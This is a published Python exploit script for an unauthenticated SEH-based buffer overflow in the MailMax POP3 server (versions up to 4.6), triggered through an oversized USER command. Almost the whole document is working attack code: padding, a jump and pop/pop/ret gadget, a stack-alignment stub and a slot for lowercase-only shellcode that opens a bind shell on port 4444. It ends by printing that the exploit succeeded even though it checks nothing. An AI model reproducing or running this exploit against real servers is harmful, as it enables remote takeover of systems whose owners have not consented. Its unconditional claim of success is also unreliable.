
# Title : MailMax <=v4.6 POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)
# Published : 2012-03-30
# Author :


#!/usr/bin/python

# MailMax <=v4.6 POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)
# Newer versions not tested; they may be vulnerable too.
# A hard one, this: the shellcode MUST be lowercase. Plus there are many opcodes that break
# the payload, and opcodes that get changed: "\xc3" becomes "\xe3" and "\xd3" becomes "\xf3" (each byte ORed
# with 0x20). That is consistent with the server running the USER argument through a locale-aware tolower()
# (0xc3/0xd3 are Latin-1 'Ã'/'Ó'), so presumably any byte that is an uppercase letter in that charset is unsafe.
# written by localh0t
# Date: 29/03/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Tested on: Windows XP SP3 Spanish (No DEP)
# Targets: Windows (All) (DEP Disabled)
# Shellcode: Bindshell on port 4444 (change as you wish; if you regenerate it, it must be lowercase-only and use EBX as the base address)

from socket import *
import sys, struct, os, time

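if len(sys.argv) < 3:
    # Usage banner. The inner quotes around USER must be escaped inside a
    # double-quoted literal, and the escape sequences need their backslashes.
    print("\nMailMax <=v4.6 POP3 \"USER\" Remote Buffer Overflow Exploit (No Login Needed)")
    print("\n\tUsage: %s <host> <port> \n" % (sys.argv[0]))
    # Non-zero status so a wrapper can tell a usage error from a completed run.
    sys.exit(1)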

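print("\n[!] Connecting to %s ..." % (sys.argv[1]))

# Connect to the POP3 service and read (but do not check) its greeting.
# A refused connection or a non-numeric port previously surfaced as a raw
# traceback; report it and exit instead.
sock = socket(AF_INET, SOCK_STREAM)
# Without a timeout a silent or filtered target leaves recv() hanging forever.
sock.settimeout(10)
try:
    sock.connect((sys.argv[1], int(sys.argv[2])))
    sock.recv(1024)  # POP3 "+OK ..." banner; its content is not inspected
except (error, ValueError) as e:  # `error` is exported by `from socket import *`
    print("[-] Could not connect to %s:%s (%s)" % (sys.argv[1], sys.argv[2], e))
    sys.exit(1)
# Pause kept from the original script; the reason for 5 s is not recorded.
time.sleep(5)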

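# Build the POP3 "USER <arg>" line. The argument overruns a stack buffer and
# the layout below is the classic SEH overwrite: nSEH = short jmp, SEH =
# pop/pop/ret, execution resumes just past the handler address. Per the
# header comment the server case-folds the argument, so every byte here --
# stub and shellcode alike -- has to survive that transformation.
parts = []
parts.append("USER ")
parts.append("A" * 1439)            # padding up to the SEH record
parts.append("\xEB\x06\x90\x90")    # nSEH: jmp short +6 (over the 2 nops + 4-byte handler)
# SEH: pop | pop | ret 0x1c at 0x1002b386 in dbmax2.dll. The address comes
# from the build tested (XP SP3 Spanish); another dbmax2.dll needs a new gadget.
parts.append("\x86\xb3\x02\x10")
parts.append("\x90" * 8)            # nops (just to be sure)

# popad pops eight dwords (the ESP slot is discarded), advancing ESP by 32
# bytes each time; 145 of them walk ESP forward into the buffer so that
# ESP ends up at the shellcode.
parts.append("\x61" * 145)
parts.append("\x90" * 11)           # nops to align
parts.append("\x21\xe3")            # and ebx,esp
parts.append("\x09\xe3")            # or  ebx,esp  -> ebx == esp whatever ebx held before
# Shellcode is lowercase-only (with digits) and uses EBX as its base address.
parts.append("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")

parts.append("\x90" * 2000)         # trailing nop sled
parts.append("\r\n")                # end of the POP3 command line
buffer = "".join(parts)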
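print("[!] Sending exploit...")
# sendall() loops until the whole line is written; a plain send() may return
# after a partial write and silently drop the tail of the payload.
try:
    sock.sendall(buffer)
finally:
    sock.close()
# NOTE(review): nothing here confirms the overflow actually fired -- the
# only check is whether the bind shell answers on port 4444 afterwards.
print("[!] Exploit succeed. Now netcat %s on port 4444\n" % (sys.argv[1]))
sys.exit()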